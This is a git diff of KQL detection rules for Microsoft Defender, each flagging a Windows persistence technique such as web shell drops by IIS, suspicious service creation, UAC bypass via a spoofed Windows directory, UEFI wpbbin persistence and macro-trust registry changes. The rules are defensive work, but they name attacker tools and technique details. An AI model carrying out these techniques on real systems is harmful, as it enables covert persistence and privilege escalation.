+DeviceFileEvents
 | where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
index 1eb691f2..91fcbf55 100644
--- a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
+++ b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
@@ -1,11 +1,11 @@
-// Title: Suspicious File Write to Webapps Root Directory
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-20
-// Level: medium
-// Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
-// This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190
-
-DeviceFileEvents
+// Title: Suspicious File Write to Webapps Root Directory
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: medium
+// Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
+// This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190
+
+DeviceFileEvents
 | where FolderPath contains "\\webapps\\ROOT\\" and (FolderPath contains "\\apache" or FolderPath contains "\\tomcat") and FolderPath endswith ".jsp" and (InitiatingProcessFolderPath endswith "\\dotnet.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\java.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_iis_module_registration.kql b/KQL/rules/Persistence/suspicious_iis_module_registration.kql
index 7b2e08b7..b07ae179 100644
--- a/KQL/rules/Persistence/suspicious_iis_module_registration.kql
+++ b/KQL/rules/Persistence/suspicious_iis_module_registration.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious IIS Module Registration
-// Author: Florian Roth (Nextron Systems), Microsoft (idea)
-// Date: 2022-08-04
-// Level: high
-// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.004
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Suspicious IIS Module Registration
+// Author: Florian Roth (Nextron Systems), Microsoft (idea)
+// Date: 2022-08-04
+// Level: high
+// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.004
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_new_service_creation.kql b/KQL/rules/Persistence/suspicious_new_service_creation.kql
index 5202d2e0..308b2067 100644
--- a/KQL/rules/Persistence/suspicious_new_service_creation.kql
+++ b/KQL/rules/Persistence/suspicious_new_service_creation.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious New Service Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-14
-// Level: high
-// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious New Service Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-14
+// Level: high
+// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql b/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql
index 9b458273..72c85e6e 100644
--- a/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql
+++ b/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Printer Driver Empty Manufacturer
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-07-01
-// Level: high
-// Description: Detects a suspicious printer driver installation with an empty Manufacturer value
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675
-// False Positives:
-// - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value
-
-DeviceRegistryEvents
+// Title: Suspicious Printer Driver Empty Manufacturer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-01
+// Level: high
+// Description: Detects a suspicious printer driver installation with an empty Manufacturer value
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675
+// False Positives:
+// - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value
+
+DeviceRegistryEvents
 | where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey endswith "\\CutePDF Writer v4.0*" or RegistryKey endswith "\\Version-3\\PDF24*" or (RegistryKey endswith "\\VNC Printer (PS)*" or RegistryKey endswith "\\VNC Printer (UD)*"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
index ec98b945..387273e9 100644
--- a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
+++ b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Process By Web Server Process
-// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-01-16
-// Level: high
-// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190
-// False Positives:
-// - Particular web applications may spawn a shell process legitimately
-
-DeviceProcessEvents
+// Title: Suspicious Process By Web Server Process
+// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190
+// False Positives:
+// - Particular web applications may spawn a shell process legitimately
+
+DeviceProcessEvents
 | where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith 
"\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql b/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql
index 4f062d73..9ae2044d 100644
--- a/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql
+++ b/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Process Execution From Fake Recycle.Bin Folder
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-07-12
-// Level: high
-// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious Process Execution From Fake Recycle.Bin Folder
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: high
+// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql b/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql
index 1b81012b..20e2e203 100644
--- a/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql
+++ b/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Registry Modification From ADS Via Regini.EXE
-// Author: Eli Salem, Sander Wiebing, oscd.community
-// Date: 2020-10-12
-// Level: high
-// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1112, attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious Registry Modification From ADS Via Regini.EXE
+// Author: Eli Salem, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql
index 01395494..7cd415cb 100644
--- a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql
+++ b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious ScreenSave Change by Reg.exe
-// Author: frack113
-// Date: 2021-08-19
-// Level: medium
-// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
-// False Positives:
-// - GPO
-
-DeviceProcessEvents
+// Title: Suspicious ScreenSave Change by Reg.exe
+// Author: frack113
+// Date: 2021-08-19
+// Level: medium
+// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
+// False Positives:
+// - GPO
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" 
and ProcessCommandLine contains "/f"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_service_path_modification.kql b/KQL/rules/Persistence/suspicious_service_path_modification.kql
index ae3e9bc4..845ab73d 100644
--- a/KQL/rules/Persistence/suspicious_service_path_modification.kql
+++ b/KQL/rules/Persistence/suspicious_service_path_modification.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Service Path Modification
-// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-21
-// Level: high
-// Description: Detects service path modification via the "sc" binary to a suspicious command or path
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious Service Path Modification
+// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-21
+// Level: high
+// Description: Detects service path modification via the "sc" binary to a suspicious command or path
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql
index 34a9f69f..c8a806ef 100644
--- a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql
+++ b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql
@@ -1,14 +1,14 @@
-// Title: Suspicious VBoxDrvInst.exe Parameters
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020-10-06
-// Level: medium
-// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
-// This allows to create values in the registry and install drivers.
-// For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process
-
-DeviceProcessEvents
+// Title: Suspicious VBoxDrvInst.exe Parameters
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
+// This allows to create values in the registry and install drivers.
+// For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql b/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql
index 5f67a5a7..03fc04ae 100644
--- a/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql
+++ b/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql
@@ -1,10 +1,10 @@
-// Title: Terminal Server Client Connection History Cleared - Registry
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-10-19
-// Level: high
-// Description: Detects the deletion of registry keys containing the MSTSC connection history
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1070, attack.t1112
-
-DeviceRegistryEvents
+// Title: Terminal Server Client Connection History Cleared - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-10-19
+// Level: high
+// Description: Detects the deletion of registry keys containing the MSTSC connection history
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1070, attack.t1112
+
+DeviceRegistryEvents
 | where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\Microsoft\\Terminal Server Client\\Servers*")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql b/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql
index b5c08c75..07f21acf 100644
--- a/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql
+++ b/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql
@@ -1,12 +1,12 @@
-// Title: Trust Access Disable For VBApplications
-// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-05-22
-// Level: high
-// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Trust Access Disable For VBApplications
+// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-22
+// Level: high
+// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql
index 5a550630..34402445 100644
--- a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql
+++ b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql
@@ -1,13 +1,13 @@
-// Title: Trusted Path Bypass via Windows Directory Spoofing
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-06-17
-// Level: high
-// Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification.
-// This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Trusted Path Bypass via Windows Directory Spoofing
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-17
+// Level: high
+// Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification.
+// This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath contains ":\\Windows \\System32\\" or FolderPath contains ":\\Windows \\SysWOW64\\"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql b/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql
index 47262b30..22219519 100644
--- a/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql
+++ b/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql
@@ -1,12 +1,12 @@
-// Title: UAC Bypass With Fake DLL
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020-10-06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1574.001
-// False Positives:
-// - Actions of a legitimate telnet client
-
-DeviceImageLoadEvents
+// Title: UAC Bypass With Fake DLL
+// Author: oscd.community, Dmitry Uchakin
+// Date: 2020-10-06
+// Level: high
+// Description: Attempts to load dismcore.dll after dropping it
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1574.001
+// False Positives:
+// - Actions of a legitimate telnet client
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql
index bac7ab41..6ebcc586 100644
--- a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql
+++ b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql
@@ -1,12 +1,12 @@
-// Title: UEFI Persistence Via Wpbbin - FileCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-18
-// Level: high
-// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
-// False Positives:
-// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
-
-DeviceFileEvents
+// Title: UEFI Persistence Via Wpbbin - FileCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-18
+// Level: high
+// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
+// False Positives:
+// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
+
+DeviceFileEvents
 | where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql
index 231706a3..7b3939f6 100644
--- a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql
+++ b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql
@@ -1,12 +1,12 @@
-// Title: UEFI Persistence Via Wpbbin - ProcessCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-18
-// Level: high
-// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
-// False Positives:
-// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
-
-DeviceProcessEvents
+// Title: UEFI Persistence Via Wpbbin - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-18
+// Level: high
+// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
+// False Positives:
+// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
+
+DeviceProcessEvents
 | where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
index ade7cbe0..539307b3 100644
--- a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
+++ b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
@@ -1,11 +1,11 @@
-// Title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-01
-// Level: medium
-// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
-// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
-
-DeviceProcessEvents
+// Title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: medium
+// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
+// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql b/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql
index b59815c2..5e7459d2 100644
--- a/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql
+++ b/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql
